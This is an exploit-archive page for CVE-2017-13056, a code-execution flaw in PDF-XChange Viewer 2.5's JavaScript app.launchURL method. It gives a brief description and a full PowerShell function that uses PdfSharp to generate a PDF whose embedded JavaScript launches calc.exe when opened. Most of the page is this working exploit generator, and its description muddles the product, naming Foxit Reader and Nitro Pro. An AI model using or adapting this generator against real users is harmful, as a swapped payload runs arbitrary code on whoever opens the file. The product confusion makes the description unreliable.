PDF-XChange Viewer 2.5 (Build 314.0) Code Execution



EKU-ID: 6881 CVE: 2017-13056 OSVDB-ID:
Author: Daniele Votta Published: 2017-08-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
# Date: 21-08-2017
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
# Exploit Author: Daniele Votta
# Contact: vottadaniele@gmail.com
# Website: https://www.linkedin.com/in/vottadaniele/
# CVE: 2017-13056

# Category: PDF Reader RCE
 
1. Description

This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer. 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. 
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within app.launchURL method. The issue results from the lack of proper validation of a user-supplied string
before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of the current process.
The launchURL() function allows an attacker to execute local files on the file system and bypass the security dialog.

2. Proof of Concept (Generate evil PDF that start calc.exe) 
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
Step 3: Open the generated PDF with Nitro Pro PDF Reader
 
3. PDF Generation:

function New-PDFJS {

    

    # Use the desidered params

     [CmdletBinding()]
  
    Param (
        
    	[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
   
	[string]$msg = "Hello PDF",
 
        [string]$filename = "C:\Users\User\Desktop\calc.pdf"
  
    )

    

    # Use the PDFSharp-WPF.dll library path

    Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll

    $doc = New-Object PdfSharp.Pdf.PdfDocument
    $doc.Info.Title = $msg
    $doc.info.Creator = "AnonymousUser"
    $page = $doc.AddPage()

    $graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
    $font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
    $box  = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
    $graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)

    $dictjs = New-Object PdfSharp.Pdf.PdfDictionary
    $dictjs.Elements["/S"]  = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
    $dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
   
    $doc.Internals.AddObject($dictjs)

    $dict = New-Object PdfSharp.Pdf.PdfDictionary
    $pdfarray = New-Object PdfSharp.Pdf.PdfArray
    $embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")

    $dict.Elements["/Names"] = $pdfarray
    $pdfarray.Elements.Add($embeddedstring)
    $pdfarray.Elements.Add($dictjs.Reference)
    $doc.Internals.AddObject($dict)

    $dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
    $dictgroup.Elements["/JavaScript"] = $dict.Reference
    $doc.Internals.Catalog.Elements["/Names"] = $dictgroup

    $doc.Save($filename)
}